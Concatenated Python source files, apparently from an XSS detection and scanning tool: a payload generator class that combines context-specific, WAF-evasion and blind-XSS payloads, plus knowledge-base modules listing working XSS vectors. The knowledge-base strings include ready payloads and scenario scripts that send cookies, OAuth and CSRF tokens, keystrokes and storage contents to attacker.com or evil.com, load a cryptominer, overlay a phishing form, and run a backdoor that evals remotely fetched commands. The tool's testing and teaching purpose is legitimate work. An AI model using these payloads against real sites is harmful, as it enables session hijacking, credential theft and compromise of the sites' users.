    return sorted(_KNOWLEDGE_BASE.keys())

# --- Pre-initialize on module load ---
_initialize_knowledge_base()



#!/usr/bin/env python3

"""
Project: BRS-XSS (XSS Detection Suite)
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: Fri 10 Oct 2025 14:12:02 UTC
Status: Modified
Telegram: https://t.me/EasyProTech
"""

from typing import Dict, List, Optional, Any, Mapping, Set
from collections import Counter
from itertools import islice
from functools import lru_cache
import hashlib
import random

from .payload_types import GeneratedPayload, GenerationConfig, EvasionTechnique
from .context_payloads import ContextPayloadGenerator
from .evasion_techniques import EvasionTechniques
from .waf_evasions import WAFEvasions
from .blind_xss import BlindXSSManager
from ..payloads.payload_manager import PayloadManager
from ..payloads.context_matrix import ContextMatrix, Context
from ..utils.logger import Logger

# Type alias for WAF detection results
DetectedWAF = Any

logger = Logger("core.payload_generator")

# Clean module exports
__all__ = ["PayloadGenerator", "DetectedWAF"]


class PayloadGenerator:
    """
    Main XSS payload generation orchestrator.
    
    Coordinates multiple specialized generators to create
    context-aware payloads with evasion techniques.
    """
    
    def __init__(self, config: Optional[GenerationConfig] = None, blind_xss_webhook: Optional[str] = None):
        """
        Initialize payload generator.
        
        Args:
            config: Generation configuration
            blind_xss_webhook: Webhook URL for blind XSS detection
        """
        self.config = config or GenerationConfig()
        
        # Initialize generators
        self.context_generator = ContextPayloadGenerator()
        self.payload_manager = PayloadManager()
        self.context_matrix = ContextMatrix()  # New context-aware payload system
        self.evasion_techniques = EvasionTechniques()
        self.waf_evasions = WAFEvasions()
        # Blind XSS manager: if webhook provided explicitly, prefer it and allow generation
        self._explicit_webhook = bool(blind_xss_webhook)
        self.blind_xss = BlindXSSManager(blind_xss_webhook) if blind_xss_webhook else None
        
        # Statistics with Counter for better performance
        self.generated_count = 0
        self.generation_stats = {
            "total_generated": 0,
            "by_context": Counter(),
            "by_technique": Counter(),
            "by_source": Counter(),
            "success_rate": 0.0,
        }
        
        # Deterministic random generator (for future use in tie-breaking)
        self._rand = random.Random(getattr(self.config, "seed", 1337))
        
        # Warning state for safe mode
        self._warned_blind = False
        
        # Validate configuration on initialization
        self._validate_config()
        
        logger.info("Payload generator initialized")
    
    def _validate_config(self):
        """Validate configuration parameters"""
        fields = [
            ("max_payloads", 1, 100000),
            ("effectiveness_threshold", 0.0, 1.0),
            ("max_manager_payloads", 0, 200000),
            ("max_evasion_bases", 0, 1000),
            ("evasion_variants_per_tech", 0, 50),
            ("waf_bases", 0, 100),
        ]
        
        for name, lo, hi in fields:
            val = getattr(self.config, name, None)
            if val is None or not (lo <= val <= hi):
                raise ValueError(f"Invalid config: {name}={val}, expected range [{lo}, {hi}]")
        
        # Validate pool_cap if present
        pool_cap = getattr(self.config, "pool_cap", 10000)
        if not (100 <= pool_cap <= 200000):
            raise ValueError(f"Invalid config: pool_cap={pool_cap}, expected range [100, 200000]")
    
    def _norm_key(self, s: str) -> str:
        """Normalize payload for deduplication with optional hashing"""
        # Remove whitespace, comments, convert to lowercase
        cleaned = " ".join(s.split()).lower()
        # Use hash for crypto-resistant deduplication if enabled
        use_hash = getattr(self.config, "norm_hash", False)
        return hashlib.sha256(cleaned.encode()).hexdigest() if use_hash else cleaned
    
    @lru_cache(maxsize=65536)
    def _norm_key_cached(self, s: str) -> str:
        """Cached version of _norm_key for better performance on large pools"""
        return self._norm_key(s)
    
    def _safe_list(self, xs):
        """Convert to safe list, protecting against generators/None"""
        return xs if isinstance(xs, list) else list(xs or [])
    
    def _get_weights(self):
        """Get weights with universal compatibility for dict/object"""
        defaults = {
            "context_specific": 0.92,
            "context_matrix": 0.90, 
            "comprehensive": 0.70,
            "evasion": 0.75
        }
        w = getattr(self.config, "weights", None)
        if w is None:
            return defaults
        if isinstance(w, dict):
            return {k: float(w.get(k, v)) for k, v in defaults.items()}
        return {k: float(getattr(w, k, v)) for k, v in defaults.items()}
    
    def _wrap(self, ctx: str, payload: Any, tag: str, eff: float) -> GeneratedPayload:
        """Wrap payload in GeneratedPayload object with length protection"""
        payload_str = str(payload).strip() if payload is not None else ""
        max_len = getattr(self.config, "payload_max_len", 4096)
        if len(payload_str) > max_len:
            payload_str = payload_str[:max_len]
        return GeneratedPayload(
            payload=payload_str,
            context_type=ctx,
            evasion_techniques=[],
            effectiveness_score=eff,
            description=tag
        )
    
    def generate_payloads(
        self,
        context_info: Mapping[str, Any],
        detected_wafs: Optional[List[DetectedWAF]] = None,
        max_payloads: Optional[int] = None
    ) -> List[GeneratedPayload]:
        """
        Generate context-aware XSS payloads.
        
        Args:
            context_info: Context analysis results
            detected_wafs: Detected WAF information
            max_payloads: Maximum number of payloads (overrides config)
            
        Returns:
            List of generated payloads
        """
        max_count = max_payloads or self.config.max_payloads
        max_count = max(1, min(max_count, getattr(self.config, "pool_cap", 10000)))
        context_type = context_info.get('context_type', 'unknown')
        
        # Configuration limits with safe defaults
        manager_cap = getattr(self.config, "max_manager_payloads", 2000)
        evasion_bases = getattr(self.config, "max_evasion_bases", 10)
        evasion_variants = getattr(self.config, "evasion_variants_per_tech", 2)
        waf_bases = getattr(self.config, "waf_bases", 3)
        
        # Quiet logging for large pools
        pool_cap = getattr(self.config, "pool_cap", 10000)
        logger.debug(f"Generating max {max_count} for context={context_type} "
                    f"(manager={manager_cap}, evasion_bases={evasion_bases}, pool_cap={pool_cap})")
        
        # Build payload pool without excessive memory allocation
        pool: List[GeneratedPayload] = []
        
        # Get configurable weights for payload sources
        weights = self._get_weights()
        w_ctx = weights["context_specific"]
        w_mat = weights["context_matrix"]
        w_all = weights["comprehensive"]
        
        # 1. Base context payloads from context generator with error handling
        try:
            base_payloads = self.context_generator.get_context_payloads(context_type, dict(context_info))
        except Exception as e:
            logger.error(f"context_generator failed: {e}")
            base_payloads = []
        
        pool.extend([self._wrap(context_type, p, "Context-specific", w_ctx) 
                    for p in base_payloads if str(p).strip()])
        
        # 2. Context Matrix payloads - always include polyglots; context-specific if recognized
        matrix_payloads = []
        context_mapping = {
            'html_content': Context.HTML,
            'html_attribute': Context.ATTRIBUTE, 
            'javascript': Context.JAVASCRIPT,
            'css': Context.CSS,
            'uri': Context.URI,
            'svg': Context.SVG
        }
        if context_type in context_mapping:
            matrix_context = context_mapping.get(context_type, Context.HTML)
            matrix_payloads = list(self.context_matrix.get_context_payloads(matrix_context))
            if getattr(self.config, 'enable_aggressive', False):
                matrix_payloads.extend(self.context_matrix.get_aggr_payloads())
        # Polyglots are useful in any context, include them always
        matrix_payloads.extend(self.context_matrix.get_polyglot_payloads())
        
        pool.extend([self._wrap(context_type, p, "Context-matrix", w_mat) 
                    for p in matrix_payloads if str(p).strip()])
        
        # 3. payloads with cap to avoid memory issues
        comprehensive_payloads = islice(self.payload_manager.get_all_payloads(), manager_cap)
        pool.extend([self._wrap(context_type, p, "Comprehensive", w_all) 
                    for p in comprehensive_payloads if str(p).strip()])
        
        # Hard cap pool size to prevent memory issues
        pool_cap = getattr(self.config, "pool_cap", 10000)
        if len(pool) > pool_cap:
            # Keep proportions: take top by priority (already sorted by effectiveness)
            pool = pool[:pool_cap]
        
        # 4. Sдержанный evasion - только на лучших базовых пейлоадах
        if self.config.include_evasions and pool:
            base_for_evasion = [p.payload for p in pool[:min(evasion_bases, len(pool))]]
            evasion_payloads = self._apply_evasion_techniques(
                base_for_evasion, dict(context_info), limit_per_tech=evasion_variants
            )
            pool.extend(evasion_payloads)
        
        # 5. WAF-specific payloads - только на топ базовых
        if self.config.include_waf_specific and detected_wafs:
            base_for_waf = [p.payload for p in pool[:min(waf_bases, len(pool))]]
            waf_payloads = self._generate_waf_specific_payloads(base_for_waf, detected_wafs)
            pool.extend(waf_payloads)

        # 5.1 Blind XSS payloads (insert into pool so they participate in filtering/sorting)
        explicit_webhook = self._explicit_webhook
        safe_mode = getattr(self.config, "safe_mode", True)
        if safe_mode and self.config.include_blind_xss and not explicit_webhook and not self._warned_blind:
            logger.warning("include_blind_xss ignored due to safe_mode")
            self._warned_blind = True
        elif self.blind_xss and ((not safe_mode and self.config.include_blind_xss) or explicit_webhook):
            ct = context_type
            if ct == "html_content":
                bctx = "html"
            elif ct == "html_attribute":
                bctx = "attribute"
            elif ct in ("javascript", "js_string"):
                bctx = "javascript"
            elif ct in ("css", "css_style"):
                bctx = "css"
            else:
                bctx = "html"
            # Support both legacy generate_payloads(ctx, info) and new generate_blind_payloads(ctx)
            if hasattr(self.blind_xss, "generate_payloads"):
                blind_payloads = self.blind_xss.generate_payloads(bctx, context_info)
            else:
                blind_payloads = self.blind_xss.generate_blind_payloads(bctx)
            blind_limit = getattr(self.config, "blind_batch_limit", 10)
            for s in blind_payloads[:blind_limit]:
                if isinstance(s, GeneratedPayload):
                    pool.append(s)
                else:
                    pool.append(self._wrap(context_type, s, "BlindXSS", 0.95))
        
        # 6. Early filtering, deduplication, and sorting
        thr = getattr(self.config, 'effectiveness_threshold', 0.65)
        seen: Set[str] = set()
        filtered: List[GeneratedPayload] = []
        
        for p in pool:
            if p.effectiveness_score < thr:
                continue
            key = self._norm_key_cached(p.payload)
            if key in seen:
                continue
            seen.add(key)
            filtered.append(p)
        
        # Stable sort: by score desc, then by payload for determinism
        sorted_payloads = sorted(
            filtered,
            key=lambda x: (-x.effectiveness_score, x.payload)
        )[:max_count]
        
        # (Blind XSS were already inserted into the pool above)
        
        # Final deduplication after blind XSS to prevent duplicates
        seen_final: Set[str] = set()
        final: List[GeneratedPayload] = []
        for p in sorted_payloads:
            k = self._norm_key_cached(p.payload)
            if k in seen_final:
                continue
            seen_final.add(k)
            final.append(p)
        sorted_payloads = final[:max_count]
        
        # Update statistics with Counter
        self._update_statistics(sorted_payloads, context_type, len(pool))
        
        logger.info(f"Generated {len(sorted_payloads)} payloads for context={context_type}")
        logger.debug(f"candidates={len(pool)} filtered={len(filtered)} final={len(sorted_payloads)}")
        
        return sorted_payloads
    
    def generate_single_payload(
        self,
        context_info: Dict[str, Any],
        technique: Optional[EvasionTechnique] = None
    ) -> Optional[GeneratedPayload]:
        """
        Generate a single optimized payload.
        
        Args:
            context_info: Context information
            technique: Specific evasion technique to use
            
        Returns:
            Single best payload or None
        """
        context_type = context_info.get('context_type', 'unknown')
        
        # Get best base payload for context
        base_payloads = self.context_generator.get_context_payloads(
            context_type, context_info
        )
        
        if not base_payloads:
            return None
        
        best_payload = base_payloads[0]  # First is usually most effective
        
        # Apply specific technique if requested
        if technique:
            modified_payloads = self._apply_specific_technique(
                best_payload, technique
            )
            if modified_payloads:
                best_payload = modified_payloads[0]
        
        result = GeneratedPayload(
            payload=best_payload,
            context_type=context_type,
            evasion_techniques=[technique.value] if technique else [],
            effectiveness_score=0.9,
            description="Optimized single payload"
        )
        
        self.generated_count += 1
        logger.debug(f"Generated single payload: {best_payload[:50]}...")
        
        return result
    
    def _apply_evasion_techniques(
        self,
        base_payloads: List[str],
        context_info: Mapping[str, Any],
        limit_per_tech: int = 2
    ) -> List[GeneratedPayload]:
        """Apply various evasion techniques to base payloads"""
        evasion_payloads = []
        
        # Limit base payloads to avoid explosion
        limited_base = base_payloads[:5]
        
        for base_payload in limited_base:
            # Skip empty or overly long payloads for safety
            if not base_payload or len(base_payload) > 4096:
                continue
                
            # Apply each evasion technique
            techniques_map = {
                'case_variation': self.evasion_techniques.apply_case_variations,
                'url_encoding': self.evasion_techniques.apply_url_encoding,
                'html_entity_encoding': self.evasion_techniques.apply_html_entity_encoding,
                'unicode_escaping': self.evasion_techniques.apply_unicode_escaping,
                'comment_insertion': self.evasion_techniques.apply_comment_insertions,
                'whitespace_variation': self.evasion_techniques.apply_whitespace_variations,
                'mixed_encoding': self.evasion_techniques.apply_mixed_encoding
            }
            
            for technique_name, technique_func in techniques_map.items():
                try:
                    variants = technique_func(base_payload)
                    
                    for variant in variants[:limit_per_tech]:  # Use configurable limit
                        if variant != base_payload:  # Avoid duplicates
                            evasion_payloads.append(GeneratedPayload(
                                payload=variant,
                                context_type=context_info.get('context_type', 'unknown'),
                                evasion_techniques=[technique_name],
                                effectiveness_score=0.75,
                                description=f"Evasion: {technique_name}"
                            ))
                
                except Exception as e:
                    logger.warning(f"Failed to apply {technique_name}: {e}")
                    continue
        
        logger.debug(f"Generated {len(evasion_payloads)} evasion payloads")
        return evasion_payloads
    
    def _generate_waf_specific_payloads(
        self,
        base_payloads: List[str],
        detected_wafs: List[DetectedWAF]
    ) -> List[GeneratedPayload]:
        """Generate WAF-specific evasion payloads"""
        waf_payloads = []
        
        # Use first few base payloads to avoid explosion
        for base_payload in base_payloads[:3]:
            waf_specific = self.waf_evasions.generate_waf_specific_payloads(
                base_payload, detected_wafs
            )
            waf_payloads.extend(waf_specific)
        
        logger.debug(f"Generated {len(waf_payloads)} WAF-specific payloads")
        return waf_payloads
    
    def _apply_specific_technique(
        self,
        payload: str,
        technique: EvasionTechnique
    ) -> List[str]:
        """Apply a specific evasion technique"""
        technique_map = {
            EvasionTechnique.CASE_VARIATION: self.evasion_techniques.apply_case_variations,
            EvasionTechnique.URL_ENCODING: self.evasion_techniques.apply_url_encoding,
            EvasionTechnique.HTML_ENTITY_ENCODING: self.evasion_techniques.apply_html_entity_encoding,
            EvasionTechnique.UNICODE_ESCAPING: self.evasion_techniques.apply_unicode_escaping,
            EvasionTechnique.COMMENT_INSERTION: self.evasion_techniques.apply_comment_insertions,
            EvasionTechnique.WHITESPACE_VARIATION: self.evasion_techniques.apply_whitespace_variations,
            EvasionTechnique.MIXED_ENCODING: self.evasion_techniques.apply_mixed_encoding
        }
        
        technique_func = technique_map.get(technique)
        if technique_func:
            return technique_func(payload)
        
        return [payload]
    
    def _update_statistics(self, payloads: List[GeneratedPayload], context_type: str, 
                          total_candidates: Optional[int] = None):
        """Update generation statistics with real success rate calculation"""
        self.generated_count += len(payloads)
        self.generation_stats["total_generated"] = self.generated_count
        self.generation_stats["by_context"][context_type] += len(payloads)  # type: ignore[index]
        
        # Update technique and source statistics with Counter
        for payload in payloads:
            for t in payload.evasion_techniques:
                self.generation_stats["by_technique"][t] += 1  # type: ignore[index]
            self.generation_stats["by_source"][payload.description] += 1  # type: ignore[index]
        
        # Calculate real success rate: payloads that passed threshold vs total candidates
        prev_rate = self.generation_stats["success_rate"]
        if total_candidates and total_candidates > 0:
            batch_rate = len(payloads) / float(total_candidates)
        else:
            batch_rate = 1.0  # Fallback when no candidate count available
        self.generation_stats["success_rate"] = (0.9 * prev_rate) + (0.1 * batch_rate)  # type: ignore[operator]
    
    def get_statistics(self) -> Dict[str, Any]:
        """Get generation statistics"""
        return self.generation_stats.copy()
    
    def reset_statistics(self):
        """Reset generation statistics with proper Counter types"""
        self.generated_count = 0
        self.generation_stats = {
            "total_generated": 0,
            "by_context": Counter(),
            "by_technique": Counter(),
            "by_source": Counter(),
            "success_rate": 0.0,
        }
        logger.info("Generation statistics reset")
    
    def update_config(self, config: GenerationConfig):
        """Update generation configuration with validation"""
        old_config = self.config
        self.config = config
        try:
            self._validate_config()
            logger.info(f"Generation config updated: max_payloads={config.max_payloads}")
        except ValueError as e:
            # Restore old config if validation fails
            self.config = old_config
            raise e
    
    def bulk_generate_payloads(
        self,
        contexts: List[Dict[str, Any]],
        detected_wafs: Optional[List[DetectedWAF]] = None
    ) -> Dict[str, List[GeneratedPayload]]:
        """
        Generate payloads for multiple contexts efficiently.
        
        Args:
            contexts: List of context information dicts
            detected_wafs: Detected WAF information
            
        Returns:
            Dictionary mapping context types to payload lists
        """
        results = {}
        
        logger.info(f"Bulk generating payloads for {len(contexts)} contexts")
        
        # Equal quota distribution with stable order
        quota = max(1, self.config.max_payloads // max(1, len(contexts)))
        
        for i, context_info in enumerate(contexts):
            ctx_name = context_info.get("context_type", f"context_{i}")
            
            try:
                payloads = self.generate_payloads(
                    context_info=dict(context_info),
                    detected_wafs=detected_wafs,
                    max_payloads=quota
                )
                results[ctx_name] = payloads
                
            except Exception as e:
                logger.error(f"Error generating payloads for context {ctx_name}: {e}")
                results[ctx_name] = []
        
        logger.info(f"Bulk generation completed: {len(results)} context types")
        return results


#!/usr/bin/env python3

"""
Project: BRS-XSS
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-10-10 17:31:53 UTC+3
Status: Refactored
Telegram: https://t.me/easyprotech

JavaScript Context - Advanced Attack Vectors
"""

ADVANCED_ATTACKS = """
ENCODING AND OBFUSCATION BYPASSES:

19. UNICODE ESCAPES:
    <script>var x = \\u0055SER_INPUT;</script>
    
    Payloads:
    \\u0061lert(1)
    \\u0065val(atob('YWxlcnQoMSk='))
    
    Bypass:
    var x = \\u0061lert; x(1);

20. HEX ESCAPES:
    Payload:
    \\x61lert(1)
    \\x65\\x76\\x61\\x6c('alert(1)')

21. OCTAL ESCAPES:
    Payload:
    \\141lert(1)

22. COMMENT TRICKS:
    Payload:
    /**/alert(1)/**/
    1/*comment*/;alert(1);/**/var x=1
    1;alert(1)//rest of line ignored
    1;alert(1)<!--HTML comment also works in JS
    1;alert(1)-->

JSONP EXPLOITATION:

23. CALLBACK MANIPULATION:
    Server: /api/data?callback=USER_INPUT
    Response: USER_INPUT({"data":"value"})
    
    Payloads:
    alert
    alert(1);foo
    alert(1)//
    eval
    Function('alert(1)')()//
    
    Result:
    <script src="/api/data?callback=alert"></script>
    Executes: alert({"data":"value"})

24. JSONP WITH VALIDATION BYPASS:
    If server validates [a-zA-Z0-9_]:
    
    Use existing functions:
    alert
    console.log
    eval
    
    With dots (if allowed):
    console.log
    document.write
    window.alert

FRAMEWORK-SPECIFIC ATTACKS:

25. ANGULAR (v1.x) TEMPLATE INJECTION IN SCRIPT:
    <script>
    var template = '{{USER_INPUT}}';
    </script>
    
    Payload:
    {{constructor.constructor('alert(1)')()}}
    {{$on.constructor('alert(1)')()}}

26. VUE SERVER-SIDE RENDERING:
    <script>
    var app = new Vue({
        data: {value: 'USER_INPUT'}
    });
    </script>
    
    If USER_INPUT reaches template:
    {{constructor.constructor('alert(1)')()}}

27. REACT SSR ESCAPING BYPASS:
    Normally React escapes, but in <script>:
    <script>
    window.__INITIAL_STATE__ = USER_INPUT;
    </script>
    
    If not properly serialized:
    </script><script>alert(1)</script><script>

EXPLOITATION TECHNIQUES:

28. SCRIPT GADGETS:
    Using existing page scripts for exploitation:
    
    If page has:
    <script>
    function loadModule(name) {
        var script = document.createElement('script');
        script.src = '/modules/' + name + '.js';
        document.body.appendChild(script);
    }
    </script>
    
    Inject:
    null; loadModule('../../evil.com/xss'); var x=null

29. BREAKING OUT OF FUNCTIONS:
    <script>
    function process() {
        var data = USER_INPUT;
        return data;
    }
    </script>
    
    Payloads:
    null; } alert(1); function process() { var data=null
    null}};alert(1);process=function(){return null

30. MODULE IMPORTS:
    <script type="module">
    import {func} from 'USER_INPUT';
    </script>
    
    Payload:
    data:text/javascript,alert(1)//

REAL-WORLD ATTACK SCENARIOS:

SESSION HIJACKING:
<script>
var userId = null; 
fetch('//attacker.com/steal?c=' + btoa(document.cookie));
var x = null;
</script>

KEYLOGGER:
<script>
var data = null;
document.addEventListener('keypress', e => {
    fetch('//attacker.com/log?k=' + e.key);
});
var x = null;
</script>

CRYPTOCURRENCY MINING:
<script>
var config = null;
var script = document.createElement('script');
script.src = '//attacker.com/coinhive.min.js';
document.head.appendChild(script);
setTimeout(() => {
    new CoinHive.Anonymous('attacker-key').start();
}, 1000);
var x = null;
</script>

PHISHING PAGE INJECTION:
<script>
var user = null;
document.body.innerHTML = '<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:white;z-index:99999"><form action="//evil.com/phish" method="POST"><h2>Session Expired</h2><input name="user" placeholder="Username" required><input name="pass" type="password" placeholder="Password" required><button>Login</button></form></div>';
var x = null;
</script>

DATA EXFILTRATION:
<script>
var apiKey = null;
var sensitiveData = {
    cookies: document.cookie,
    localStorage: JSON.stringify(localStorage),
    sessionStorage: JSON.stringify(sessionStorage),
    location: window.location.href,
    referrer: document.referrer
};
fetch('//attacker.com/exfil', {
    method: 'POST',
    body: JSON.stringify(sensitiveData)
});
var x = null;
</script>

PERSISTENT BACKDOOR:
<script>
var temp = null;
setInterval(() => {
    fetch('//attacker.com/cmd')
        .then(r => r.text())
        .then(cmd => eval(cmd));
}, 5000);
var x = null;
</script>
"""




#!/usr/bin/env python3

"""
Project: BRS-XSS
Company: EasyProTech LLC (www.easypro.tech)
Dev: Brabus
Date: 2025-10-10 17:31:53 UTC+3
Status: Refactored
Telegram: https://t.me/easyprotech

HTML Content Context - Attack Vectors
"""

ATTACK_VECTOR = """
CLASSIC ATTACK VECTORS:

1. SCRIPT TAG INJECTION:
   <script>alert(document.cookie)</script>
   <script>fetch('//attacker.com/steal?c='+document.cookie)</script>
   <script src="//evil.com/xss.js"></script>
   
2. IMG TAG WITH ONERROR:
   <img src=x onerror=alert(1)>
   <img src=x onerror="fetch('//attacker.com?c='+btoa(document.cookie))">
   <img/src=x onerror=eval(atob('YWxlcnQoMSk='))>

3. SVG ONLOAD:
   <svg onload=alert(1)>
   <svg/onload=alert`1`>
   <svg><script>alert(1)</script></svg>
   <svg><animate onbegin=alert(1) attributeName=x dur=1s>

4. IFRAME INJECTION:
   <iframe src=javascript:alert(1)>
   <iframe srcdoc="<script>alert(1)</script>">
   <iframe src="data:text/html,<script>alert(1)</script>">

5. BODY/HTML EVENT HANDLERS:
   <body onload=alert(1)>
   <body onpageshow=alert(1)>
   <body onfocus=alert(1)>

6. INPUT/FORM AUTOFOCUS:
   <input onfocus=alert(1) autofocus>
   <select onfocus=alert(1) autofocus>
   <textarea onfocus=alert(1) autofocus>
   <keygen onfocus=alert(1) autofocus>

7. DETAILS/SUMMARY (HTML5):
   <details open ontoggle=alert(1)>
   <details><summary>Click</summary><script>alert(1)</script></details>

8. VIDEO/AUDIO TAGS:
   <video><source onerror=alert(1)>
   <audio src=x onerror=alert(1)>
   <video poster=javascript:alert(1)>

9. MARQUEE/BLINK:
   <marquee onstart=alert(1)>XSS</marquee>
   <marquee loop=1 width=0 onfinish=alert(1)>

10. OBJECT/EMBED:
    <object data="javascript:alert(1)">
    <embed src="javascript:alert(1)">
    <object data="data:text/html,<script>alert(1)</script>">

MODERN BYPASSES AND TECHNIQUES:

11. MUTATION XSS (mXSS):
    Payloads that look safe but become dangerous after HTML parsing:
    <noscript><p title="</noscript><img src=x onerror=alert(1)>">
    <form><math><mtext></form><form><mglyph><style></math><img src=x onerror=alert(1)>

12. DANGLING MARKUP INJECTION:
    Used for data exfiltration when XSS is partially filtered:
    <img src='//attacker.com/collect?
    (Captures all following HTML until next single quote)

13. HTML5 FORM HIJACKING:
    <form action="//attacker.com"><button>Click</button></form>
    <input form=x><form id=x action="//evil.com"><button>Submit</button></form>

14. POLYGLOT VECTORS:
    Works across multiple contexts (HTML, JS, etc):
    javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
    jaVasCript:/*-/*`/*\\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//\\x3e

15. UNICODE/ENCODING BYPASSES:
    <script>\\u0061lert(1)</script>
    <script>\\x61lert(1)</script>
    <script>eval('\\x61lert(1)')</script>
    <img src=x onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;">

16. NULL BYTE INJECTION:
    <script>alert(1)</script>%00
    <img src=x%00 onerror=alert(1)>

17. BREAKING OUT OF ATTRIBUTES:
    If input is in: <div data-text="USER_INPUT">
    Payload: "><script>alert(1)</script>
    Result: <div data-text=""><script>alert(1)</script>">

18. COMMENT BREAKOUT:
    <!-- USER_INPUT -->
    Payload: --><script>alert(1)</script><!--

19. CSS EXPRESSION (Legacy IE):
    <style>body{background:expression(alert(1))}</style>

20. BASE TAG HIJACKING:
    <base href="//attacker.com/">
    (Hijacks all relative URLs on page)

REAL-WORLD ATTACK SCENARIOS:

SESSION HIJACKING:
<script>
new Image().src='//attacker.com/steal?c='+document.cookie;
</script>

KEYLOGGER:
<script>
document.onkeypress=function(e){
  fetch('//attacker.com/log?k='+e.key);
}
</script>

PHISHING:
<div style="position:fixed;top:0;left:0;width:100%;height:100%;background:white;z-index:9999">
  <form action="//attacker.com/phish">
    <h2>Session Expired - Please Login</h2>
    <input name="user" placeholder="Username">
    <input name="pass" type="password" placeholder="Password">
    <button>Login</button>
  </form>
</div>

CRYPTOCURRENCY MINER:
<script src="//attacker.com/coinhive.js"></script>
<script>
var miner=new CoinHive.Anonymous('attacker-key');
miner.start();
</script>

DEFACEMENT:
<script>
document.body.innerHTML='<h1>Hacked by Attacker</h1>';
</script>

BROWSER EXPLOITATION:
<script src="//attacker.com/browser-exploit.js"></script>

OAUTH TOKEN THEFT:
<script>
var token=localStorage.getItem('oauth_token');
fetch('//attacker.com/steal?t='+token);
</script>

CSRF TOKEN EXFILTRATION:
<script>
var csrf=document.querySelector('[name=csrf_token]').value;
fetch('//attacker.com/csrf?t='+csrf);
</script>
"""

